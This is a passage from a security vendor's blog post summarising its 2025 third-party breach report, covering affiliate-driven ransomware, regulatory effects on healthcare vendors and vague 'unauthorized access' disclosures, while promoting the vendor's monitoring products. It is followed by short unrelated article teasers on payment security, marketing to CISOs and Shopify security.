Organizations need to move beyond static assessments and embrace real-time risk intelligence to detect vulnerabilities before they’re exploited. Instead of relying solely on vendors’ self-reported security measures, organizations should implement continuous monitoring tools that provide real-time visibility into third-party risks. During the Cleo File Transfer ransomware campaign, for example, Black Kite’s FocusTags™ helped organizations identify at-risk vendors and implement rapid mitigation strategies to prevent further breaches.
2. Affiliates are changing the rules of ransomware
Ransomware operations underwent a major shift in 2024, driven by changes in the underground cybercrime economy. The February attack on Change Healthcare didn’t just impact pharmacies, doctors, and hospitals — it reshaped the entire ransomware market. A payment dispute between an affiliate and a major ransomware group led to a structural change, where affiliates gained greater control and financial incentives.
This affiliate-led model has fueled a spike in ransomware activity. Now, instead of centralized ransomware groups leading the charge, affiliates are operating with more autonomy, deploying multiple types of ransomware and significantly increasing the frequency of attacks.
Healthcare bore the brunt of these attacks in 2024, accounting for over 40% of all third-party breaches. And unlike ransomware groups that historically followed an informal “twisted code of conduct” — where healthcare organizations were considered off-limits — modern affiliates have no such boundaries. They prioritize financial gain over all else, choosing targets based on likelihood to pay. The Cencora ransomware attack, for instance, allegedly resulted in a $75 million ransom payment, exposing sensitive patient data and revealing the cascading impact of third-party breaches.
This shift in ransomware tactics means organizations can no longer rely on past attack patterns to predict future threats. With financially motivated affiliates now driving attacks, businesses must invest in tools designed to proactively monitor and manage third-party risks to ensure a rapid response to disruptive events.
3. Regulations are driving cybersecurity improvements
Regulatory frameworks like DORA, HIPAA, and GDPR have been catalysts for critical risk management improvements, particularly in industries with strict compliance mandates. According to our findings, among vendors that experienced a breach and subsequently improved their cyber rating by at least 3 points, 72% serve the healthcare industry — an indication that regulatory enforcement is driving significant improvements in incident response and vendor risk management practices.
However, not all industries are keeping pace. Only 14% of vendors with improved scores following a breach support the financial services sector. Similarly, only 14% of vendors in the manufacturing sector showed progress in enhancing their cyber ratings.
The progress observed in sectors like healthcare, where regulations drove notable improvements, serves as a model for other industries to follow. But regulations aren’t enough on their own either. While regulatory frameworks establish baseline security standards, they must be backed by proactive risk management strategies. Organizations that implement continuous third-party risk monitoring, leverage real-time threat intelligence tools, and enforce vendor accountability through contractual security requirements are significantly better positioned to identify and mitigate emerging threats.
4. Defining unauthorized network access
Unauthorized network access accounted for over 50% of publicly disclosed third-party breaches in 2024. But what does that really mean? Too often, “unauthorized access” is used as a vague, catch-all explanation when organizations lack clarity on the root cause of an attack or choose not to disclose specific details. This makes it difficult to determine whether breaches were caused by stolen credentials, misconfigurations, or unpatched vulnerabilities.
The lack of transparency in incident reporting presents a serious challenge for CISOs. Without a clear picture of how attackers infiltrated a system, security teams struggle to remediate vulnerabilities and prevent future breaches. Instead of driving meaningful improvements, these incidents often fuel blame games and reactive security postures.
Given the sheer volume of breaches attributed to unauthorized access, security leaders must push for deeper analysis and clearer reporting. Creating a culture of transparency in incident reporting can help security teams better understand the root causes of unauthorized network access breaches, enabling more effective prevention strategies.
5. Building a resilient third-party risk management strategy
While we can’t predict exactly what’s next, there’s a lot we can learn from last year’s third-party breaches. By analyzing the trends, cybersecurity leaders can fine-tune their strategies to stay ahead of emerging threats. What’s clear from this year’s 2025 Third-Party Breach Report is that a proactive, collaborative approach to third-party risk management is now essential.
As we move into 2025, relying on reactive measures is no longer enough. Organizations must embrace real-time risk assessments, improve vendor communication using tools like Black Kite Bridge™, and invest in actionable remediation intelligence. Cyber threats are evolving fast, and so must the tools and strategies used to combat them. By adapting to these changes in the third-party risk landscape, companies can build a stronger, more resilient security posture and better protect themselves against the next wave of cyber threats.
Dig into our full 2025 Third Party Breach Report: The Silent Breach: How Third Parties Became the Biggest Cyber Threat in 2024 – accessible instantly, no download required.
In today's digital landscape, purchasing growth services for social media and online marketing is a common practice. However, ensuring secure transactions and protecting sensitive payment information is crucial. In this comprehensive guide, we will outline best practices to safeguard your financial data, highlight secure payment methods, and discuss how to avoid credit card fraud and chargeback scams.
Landing on the Chief Information Security Officer (CISO) desk is the holy grail for any cybersecurity marketing strategy. CISOs control million-dollar technology budgets and determine enterprise platform priorities which are highly sought after by sales teams. However, the cold, hard truth is that these influential security leaders remain largely unreachable behind a fortress of gatekeepers, outdated perceptions, and overcrowded inboxes.
Automated software attacks targeted 62% of eCommerce stores in 2022. These numbers show why online merchants now take Shopify cyber security seriously.
Online stores, especially Shopify platforms, must protect their customer's sensitive data from breaches and unauthorised access. The good news is that Shopify maintains PCI DSS Level 1 compliance, the highest security standard for payment processing. The platform's built-in fraud detection tools analyze every transaction to identify potential risks.
Login
